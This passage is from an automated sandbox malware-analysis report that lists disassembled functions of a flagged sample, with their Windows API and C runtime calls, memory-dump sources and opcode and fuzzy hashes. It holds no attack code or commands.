                                                              • Instruction Fuzzy Hash: DCB14471A122859FDB11CF28C8417FFBBA5EF45340F15856BE844AB342D2388D92CB6A
                                                              Function 02171AA7 Relevance: 6.3, APIs: 4, Instructions: 298networkfileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • InternetSetFilePointer.WININET(?,00000000,00000000,00000000,00000000), ref: 02171B2C
                                                              • InternetReadFile.WININET(?,00000000,000003E8,00000000), ref: 02171B4B
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FileInternet$PointerRead
                                                              • String ID:
                                                              • API String ID: 3197321146-0
                                                              • Opcode ID: c085227df8a80421ec7313379bf4d4e615632bf12d4a1848d02713aae509a95a
                                                              • Instruction ID: 98aa9e45beab0a478a044e327892ae867cd92dc3e12828cfc32e225c11634450
                                                              • Opcode Fuzzy Hash: c085227df8a80421ec7313379bf4d4e615632bf12d4a1848d02713aae509a95a
                                                              • Instruction Fuzzy Hash: 8FC17971A40218AFEB25CF24CD84BEAB7B5FF89304F5041E9E50DA7690DB71AA85CF50
                                                              Function 00409FC0 Relevance: 6.2, APIs: 4, Instructions: 230COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00404150: ___std_exception_copy.LIBVCRUNTIME ref: 004041DF
                                                              • std::locale::_Init.LIBCPMT ref: 0040A0CE
                                                                • Part of subcall function 0040C516: std::_Lockit::_Lockit.LIBCPMT ref: 0040C528
                                                                • Part of subcall function 0040C516: std::locale::_Setgloballocale.LIBCPMT ref: 0040C543
                                                                • Part of subcall function 0040C516: _Yarn.LIBCPMT ref: 0040C559
                                                                • Part of subcall function 0040C516: std::_Lockit::~_Lockit.LIBCPMT ref: 0040C599
                                                                • Part of subcall function 0040ABE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040AC16
                                                                • Part of subcall function 0040ABE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040AC39
                                                                • Part of subcall function 0040ABE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040AC59
                                                                • Part of subcall function 0040ABE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040ACD3
                                                              • std::locale::_Init.LIBCPMT ref: 0040A191
                                                              • Concurrency::cancel_current_task.LIBCPMT ref: 0040A2A8
                                                              • Concurrency::cancel_current_task.LIBCPMT ref: 0040A2AD
                                                                • Part of subcall function 004015C0: ___std_exception_copy.LIBVCRUNTIME ref: 004015FE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: Lockitstd::_$Lockit::_Lockit::~_std::locale::_$Concurrency::cancel_current_taskInit___std_exception_copy$SetgloballocaleYarn
                                                              • String ID:
                                                              • API String ID: 3444572950-0
                                                              • Opcode ID: 3772f73c73b648106feca3bbdd899062d8fd4c5206c57f8baaf4dcdb112cb945
                                                              • Instruction ID: 15dc990f8168f4d2899df3e18d3cde1c15f8de658f0e16a424ba317a0bc9b0b8
                                                              • Opcode Fuzzy Hash: 3772f73c73b648106feca3bbdd899062d8fd4c5206c57f8baaf4dcdb112cb945
                                                              • Instruction Fuzzy Hash: 6DA137B0900205DFDB00CF55C594B9ABBF0FF49304F1582AAE809AF792D7BAA954CF95
                                                              Function 02180062 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AdjustPointer
                                                              • String ID:
                                                              • API String ID: 1740715915-0
                                                              • Opcode ID: cfb7b64256891e6686333403dd0511379eea51aab07b80c3b7c1c719ddcf90db
                                                              • Instruction ID: d31cdaa9e82e7b515893b504d1e421b906a11536fb9e8c0b2f4aea02f845ec85
                                                              • Opcode Fuzzy Hash: cfb7b64256891e6686333403dd0511379eea51aab07b80c3b7c1c719ddcf90db
                                                              • Instruction Fuzzy Hash: A751E37268160AAFEB29AF54C8C0B7A77A5EF48324F54416DE81547290EB71E988CF90
                                                              Function 0040FDFB Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: AdjustPointer
                                                              • String ID:
                                                              • API String ID: 1740715915-0
                                                              • Opcode ID: cfb7b64256891e6686333403dd0511379eea51aab07b80c3b7c1c719ddcf90db
                                                              • Instruction ID: e8452a54d6043e1b743c3d42dff45856ced14499e589d53c32b50beca8cb4aa0
                                                              • Opcode Fuzzy Hash: cfb7b64256891e6686333403dd0511379eea51aab07b80c3b7c1c719ddcf90db
                                                              • Instruction Fuzzy Hash: A8510472A04602AFDB349F55D841B7AB3A4EF01708F14043FE90567AE1D739EC8AC788
                                                              Function 10003EDA Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2954294685.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000000.00000002.2954274750.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.2954315683.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.2954333339.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: AdjustPointer
                                                              • String ID:
                                                              • API String ID: 1740715915-0
                                                              • Opcode ID: 952e73679afc7ae5e9be77ebdc85447c9e7c58ce1189e5957c3f15572caf07ac
                                                              • Instruction ID: 9e97f9b43940e94c385e873cf65d718b9a08959cb0185780d8acf6a52a646172
                                                              • Opcode Fuzzy Hash: 952e73679afc7ae5e9be77ebdc85447c9e7c58ce1189e5957c3f15572caf07ac
                                                              • Instruction Fuzzy Hash: 9D51BFB6A04202AFFB16CF11D941BAB77A8EF047D0F11856DEA05A72A9DB31EC40D794
                                                              Function 0218E3D6 Relevance: 6.1, APIs: 4, Instructions: 86COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0218644F: _free.LIBCMT ref: 0218645D
                                                                • Part of subcall function 0218B7F5: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,02192E56,0000FDE9,00000000,?,?,?,02192BCF,0000FDE9,00000000,?), ref: 0218B8A1
                                                              • GetLastError.KERNEL32 ref: 0218E43E
                                                              • __dosmaperr.LIBCMT ref: 0218E445
                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0218E484
                                                              • __dosmaperr.LIBCMT ref: 0218E48B
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                                              • String ID:
                                                              • API String ID: 167067550-0
                                                              • Opcode ID: ff14c79e1395f32fed001daf36d8bf83056e63ebd13984d77e506e2a027871c6
                                                              • Instruction ID: 41ecbff9bb803a6a6e672fc70c31877b39aead738d87e6383ef989cd9b5b4173
                                                              • Opcode Fuzzy Hash: ff14c79e1395f32fed001daf36d8bf83056e63ebd13984d77e506e2a027871c6
                                                              • Instruction Fuzzy Hash: E1215E71684215AF9B20BF65CCC0A6AB7ADEB492B87108528F96DD7250E770EC018FA0
                                                              Function 0041E16F Relevance: 6.1, APIs: 4, Instructions: 86COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 004161E8: _free.LIBCMT ref: 004161F6
                                                                • Part of subcall function 0041B58E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,00000000,00000000,?,0041BAF6,?,00000000,00000000), ref: 0041B63A
                                                              • GetLastError.KERNEL32 ref: 0041E1D7
                                                              • __dosmaperr.LIBCMT ref: 0041E1DE
                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041E21D
                                                              • __dosmaperr.LIBCMT ref: 0041E224
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                                              • String ID:
                                                              • API String ID: 167067550-0
                                                              • Opcode ID: 2ee80bc456aaba5edad49b0c82f5904c31a9c5c935df2275ad383636a5367898
                                                              • Instruction ID: bdb0a842771a8fe777460e77f8a474c5cbd3e2640c7d3f46f2ac3ce91a7366d8
                                                              • Opcode Fuzzy Hash: 2ee80bc456aaba5edad49b0c82f5904c31a9c5c935df2275ad383636a5367898
                                                              • Instruction Fuzzy Hash: CD21B275600205BFAB206F67CC819EBB7ADEE043A8310852EFD2587251D738EC818B99
                                                              Function 10007BCE Relevance: 6.1, APIs: 4, Instructions: 86COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 10008DC4: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,00000000,00000000,?,1000B163,?,00000000,00000000), ref: 10008E70
                                                              • GetLastError.KERNEL32 ref: 10007C36
                                                              • __dosmaperr.LIBCMT ref: 10007C3D
                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 10007C7C
                                                              • __dosmaperr.LIBCMT ref: 10007C83
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2954294685.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000000.00000002.2954274750.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.2954315683.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.2954333339.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                              • String ID:
                                                              • API String ID: 1913693674-0
                                                              • Opcode ID: c5759a61a7976f34472f3230490c401b0bdcfc1ff84e849ca2e690b48099d67c
                                                              • Instruction ID: 4d86bd2ae757562d8160192595c5732c56f34f1228d97d68919d00ee2a874974
                                                              • Opcode Fuzzy Hash: c5759a61a7976f34472f3230490c401b0bdcfc1ff84e849ca2e690b48099d67c
                                                              • Instruction Fuzzy Hash: 9021AC75A00216AFB720DF658C85D5BB7ADFF042E4B108529FA699724ADB35EC408BA0
                                                              Function 10008336 Relevance: 6.1, APIs: 4, Instructions: 83COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2954294685.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000000.00000002.2954274750.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.2954315683.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.2954333339.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7fde20d58f3e1108cd5a86cb085c551b539ad6d33639cd9718ad33b154971d06
                                                              • Instruction ID: d1df9cd49d1a9d965a935ddcfcfd3b9185eaf4079d6f623355f3cc1fa6217373
                                                              • Opcode Fuzzy Hash: 7fde20d58f3e1108cd5a86cb085c551b539ad6d33639cd9718ad33b154971d06
                                                              • Instruction Fuzzy Hash: C821D075A00206BFF710DF61CC8090B779CFF846E47108124FA949215AEB31EF0087A0
                                                              Function 02189B5F Relevance: 6.1, APIs: 4, Instructions: 77COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ab3301201762d8709fda81139749348a43ff2ca55212c488a12608a7673bf9c9
                                                              • Instruction ID: 6548444a3590507ac02d19f6b7b8392f9c1a794a6c6c310a9243a8322b3eeaa0
                                                              • Opcode Fuzzy Hash: ab3301201762d8709fda81139749348a43ff2ca55212c488a12608a7673bf9c9
                                                              • Instruction Fuzzy Hash: 2021EB71A85224EBCB3167649CC5F3E77A89F427A0F160524ED16A7390DB31ED01CDE4
                                                              Function 0218908A Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLastError.KERNEL32(021720FF,?,02172103,021816D8,?,021720FF,004280A0,?,0218933A,00000000,004280A0,00000000,00000000,021720FF), ref: 0218908F
                                                              • _free.LIBCMT ref: 021890EC
                                                              • _free.LIBCMT ref: 02189122
                                                              • SetLastError.KERNEL32(00000000,00437188,000000FF,?,0218933A,00000000,004280A0,00000000,00000000,021720FF), ref: 0218912D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorLast_free
                                                              • String ID:
                                                              • API String ID: 2283115069-0
                                                              • Opcode ID: 3ed6f2ded7a2700062d3b3421f2a383b3c8afcfe95e6ce1d9bee78e28f59b4db
                                                              • Instruction ID: 3f41b249e87afbf55425bc6538e2c7050623dc494b2b3c943986e2f737a75503
                                                              • Opcode Fuzzy Hash: 3ed6f2ded7a2700062d3b3421f2a383b3c8afcfe95e6ce1d9bee78e28f59b4db
                                                              • Instruction Fuzzy Hash: 3A11E5B33C86057FCB213A78ACC4E7B265F9BC1379B250238FA24963D0DF6588059D14
                                                              Function 00418E23 Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLastError.KERNEL32(00401E98,?,00401E9C,00411471,?,00401E98,74DEDF80,?,004190D3,00000000,74DEDF80,00000000,00000000,00401E98), ref: 00418E28
                                                              • _free.LIBCMT ref: 00418E85
                                                              • _free.LIBCMT ref: 00418EBB
                                                              • SetLastError.KERNEL32(00000000,00000008,000000FF,?,004190D3,00000000,74DEDF80,00000000,00000000,00401E98), ref: 00418EC6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast_free
                                                              • String ID:
                                                              • API String ID: 2283115069-0
                                                              • Opcode ID: 35dc7ff6f55437eeeeb352e0fc4fc1d9e7ee3fa865eb4c34cbbeba1caba4d7a2
                                                              • Instruction ID: 0e464f2806eaeac5f9ced7654bcd696cc8e1c911a26352911ac68216619f9860
                                                              • Opcode Fuzzy Hash: 35dc7ff6f55437eeeeb352e0fc4fc1d9e7ee3fa865eb4c34cbbeba1caba4d7a2
                                                              • Instruction Fuzzy Hash: 8311E0723097057ACF212A76AC95EEB22599BC17A8B25063FF125C22E1DE6D8CC6512C
                                                              Function 021891E1 Relevance: 6.1, APIs: 4, Instructions: 69COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLastError.KERNEL32(?,?,?,0218166D,0218A63F,?,?,0217E3C2,?,?,?,02171344,?,021736FE,?,?), ref: 021891E6
                                                              • _free.LIBCMT ref: 02189243
                                                              • _free.LIBCMT ref: 02189279
                                                              • SetLastError.KERNEL32(00000000,00437188,000000FF,?,0217E3C2,?,?,?,02171344,?,021736FE,?,?,?), ref: 02189284
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorLast_free
                                                              • String ID:
                                                              • API String ID: 2283115069-0
                                                              • Opcode ID: d4e8bbadb4119975c1914609911bc9be28093772f9516ce2b5bebb24b6cefd60
                                                              • Instruction ID: 4b7949927669a29eef690ae1a349ce348cfd78b5f5db70af7ed7e5ad1e088c59
                                                              • Opcode Fuzzy Hash: d4e8bbadb4119975c1914609911bc9be28093772f9516ce2b5bebb24b6cefd60
                                                              • Instruction Fuzzy Hash: BC1104B37C86017FCB213678ACC0E7B355B9BC17797250238F124963E0DF6188115D65
                                                              Function 00418F7A Relevance: 6.1, APIs: 4, Instructions: 69COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLastError.KERNEL32(?,?,?,00411406,0041A3D8,?,?,0040E15B,?,?,?,004010DD,?,00403497,?,?), ref: 00418F7F
                                                              • _free.LIBCMT ref: 00418FDC
                                                              • _free.LIBCMT ref: 00419012
                                                              • SetLastError.KERNEL32(00000000,00000008,000000FF,?,0040E15B,?,?,?,004010DD,?,00403497,?,?,?), ref: 0041901D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast_free
                                                              • String ID:
                                                              • API String ID: 2283115069-0
                                                              • Opcode ID: 9e0c420a71d57c1eac789ddee66fb36f0bc41bda3a2acfdfdc4fdc3ec7323778
                                                              • Instruction ID: 81bc8fc7cbd95881107e9ffec5a672ab3f5eab8e02c6baa7b337ffd9db964308
                                                              • Opcode Fuzzy Hash: 9e0c420a71d57c1eac789ddee66fb36f0bc41bda3a2acfdfdc4fdc3ec7323778
                                                              • Instruction Fuzzy Hash: ED1182723096013A9B212B76AC95EEB265A9BC1378725023FF515832D1DE6D8CC6612D
                                                              Function 02180FEE Relevance: 6.1, APIs: 4, Instructions: 62COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,021810AF,?,?,00438470,00000000,?,021811DA,00000004,00429BA4,00429B9C,00429BA4,00000000), ref: 0218107E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FreeLibrary
                                                              • String ID:
                                                              • API String ID: 3664257935-0
                                                              • Opcode ID: b02907538fd99b55170e1f1008d4e2625caf0628eb1d99c908a259ed80e5b8af
                                                              • Instruction ID: bcb4f8be82acdab7df61cb22aea40e0e046be1c44c9262f09b8cc261a257caf5
                                                              • Opcode Fuzzy Hash: b02907538fd99b55170e1f1008d4e2625caf0628eb1d99c908a259ed80e5b8af
                                                              • Instruction Fuzzy Hash: B811A732A81761BBDB3267689C81B5D77A4AF01760F250524E919FB280D771ED028EE4
                                                              Function 02195979 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • WriteConsoleW.KERNEL32(00000000,0000000C,00000000,00000000,00000000,?,02195626,00000000,00000001,00000000,00000000,?,021928A5,?,00000000,00000000), ref: 02195990
                                                              • GetLastError.KERNEL32(?,02195626,00000000,00000001,00000000,00000000,?,021928A5,?,00000000,00000000,?,00000000,?,02192DF1,?), ref: 0219599C
                                                                • Part of subcall function 02195962: CloseHandle.KERNEL32(00437A50,021959AC,?,02195626,00000000,00000001,00000000,00000000,?,021928A5,?,00000000,00000000,?,00000000), ref: 02195972
                                                              • ___initconout.LIBCMT ref: 021959AC
                                                                • Part of subcall function 02195924: CreateFileW.KERNEL32(00432C28,40000000,00000003,00000000,00000003,00000000,00000000,02195953,02195613,00000000,?,021928A5,?,00000000,00000000,?), ref: 02195937
                                                              • WriteConsoleW.KERNEL32(00000000,0000000C,00000000,00000000,?,02195626,00000000,00000001,00000000,00000000,?,021928A5,?,00000000,00000000,?), ref: 021959C1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                              • String ID:
                                                              • API String ID: 2744216297-0
                                                              • Opcode ID: 53cd3a76a3655e62aab72a6b20d7f3bfc1b13ff990dc26beec92c4dbadd610bd
                                                              • Instruction ID: 6ebbd09c6758deaf406f0652ae359b4c99c4b44c873ed898612dc3577fb481d6
                                                              • Opcode Fuzzy Hash: 53cd3a76a3655e62aab72a6b20d7f3bfc1b13ff990dc26beec92c4dbadd610bd
                                                              • Instruction Fuzzy Hash: 77F01C36541218BFCF222F95DC04A9E3F27EB097B0B444024FB0DA5120CB328921AB94
                                                              Function 00425712 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • WriteConsoleW.KERNEL32(00000000,00000020,00000000,00000000,00000000,?,004253BF,00000000,00000001,00000000,00000000,?,0042263E,?,00000000,00000000), ref: 00425729
                                                              • GetLastError.KERNEL32(?,004253BF,00000000,00000001,00000000,00000000,?,0042263E,?,00000000,00000000,?,00000000,?,00422B8A,004244B3), ref: 00425735
                                                                • Part of subcall function 004256FB: CloseHandle.KERNEL32(FFFFFFFE,00425745,?,004253BF,00000000,00000001,00000000,00000000,?,0042263E,?,00000000,00000000,?,00000000), ref: 0042570B
                                                              • ___initconout.LIBCMT ref: 00425745
                                                                • Part of subcall function 004256BD: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,004256EC,004253AC,00000000,?,0042263E,?,00000000,00000000,?), ref: 004256D0
                                                              • WriteConsoleW.KERNEL32(00000000,00000020,00000000,00000000,?,004253BF,00000000,00000001,00000000,00000000,?,0042263E,?,00000000,00000000,?), ref: 0042575A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                              • String ID:
                                                              • API String ID: 2744216297-0
                                                              • Opcode ID: 53cd3a76a3655e62aab72a6b20d7f3bfc1b13ff990dc26beec92c4dbadd610bd
                                                              • Instruction ID: 5c91372ddcb3b0269811c4be46270c2a59ba6c8506d041d04a9d6cbd44174935
                                                              • Opcode Fuzzy Hash: 53cd3a76a3655e62aab72a6b20d7f3bfc1b13ff990dc26beec92c4dbadd610bd
                                                              • Instruction Fuzzy Hash: 69F03736601528BBCF322F91EC0499E3F26FF443B0F854025FB4D95130CA32C9619B98
                                                              Function 1000CD22 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,1000C7E8,?,00000001,?,00000001,?,1000BAAF,?,?,00000001), ref: 1000CD39
                                                              • GetLastError.KERNEL32(?,1000C7E8,?,00000001,?,00000001,?,1000BAAF,?,?,00000001,?,00000001,?,1000BFFB,10009A1A), ref: 1000CD45
                                                                • Part of subcall function 1000CD0B: CloseHandle.KERNEL32(FFFFFFFE,1000CD55,?,1000C7E8,?,00000001,?,00000001,?,1000BAAF,?,?,00000001,?,00000001), ref: 1000CD1B
                                                              • ___initconout.LIBCMT ref: 1000CD55
                                                                • Part of subcall function 1000CCCD: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,1000CCFC,1000C7D5,00000001,?,1000BAAF,?,?,00000001,?), ref: 1000CCE0
                                                              • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,1000C7E8,?,00000001,?,00000001,?,1000BAAF,?,?,00000001,?), ref: 1000CD6A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2954294685.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000000.00000002.2954274750.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.2954315683.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.2954333339.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                              • String ID:
                                                              • API String ID: 2744216297-0
                                                              • Opcode ID: 2cecfe65eba2e63a17b5684705d35a016e8c273fc96426fc022e5dbf763bb7f4
                                                              • Instruction ID: e182fa176b596d651ba3484f1012657cf00b5fef4cb1dd311ab1bc31a0a6f155
                                                              • Opcode Fuzzy Hash: 2cecfe65eba2e63a17b5684705d35a016e8c273fc96426fc022e5dbf763bb7f4
                                                              • Instruction Fuzzy Hash: 53F030368002A9BBEF125F95CC48EC93FA6FB0D3E0F018025FA0885130DA32C9609B90
                                                              Function 0040D194 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SleepConditionVariableCS.KERNELBASE(?,0040D131,00000064), ref: 0040D1B7
                                                              • LeaveCriticalSection.KERNEL32(004383D4,00438EBC,?,0040D131,00000064,?,?,?,00401047,00438EBC), ref: 0040D1C1
                                                              • WaitForSingleObjectEx.KERNEL32(00438EBC,00000000,?,0040D131,00000064,?,?,?,00401047,00438EBC), ref: 0040D1D2
                                                              • EnterCriticalSection.KERNEL32(004383D4,?,0040D131,00000064,?,?,?,00401047,00438EBC), ref: 0040D1D9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                                                              • String ID:
                                                              • API String ID: 3269011525-0
                                                              • Opcode ID: fdac45ff0301cbc5be18b6aebdbeb671c9e98f82b4ff16bb29f89a80dabf72b2
                                                              • Instruction ID: 47a6f121230fc22ef05d7342d51693ac5d84e3dbad3790f0b82a870593218e11
                                                              • Opcode Fuzzy Hash: fdac45ff0301cbc5be18b6aebdbeb671c9e98f82b4ff16bb29f89a80dabf72b2
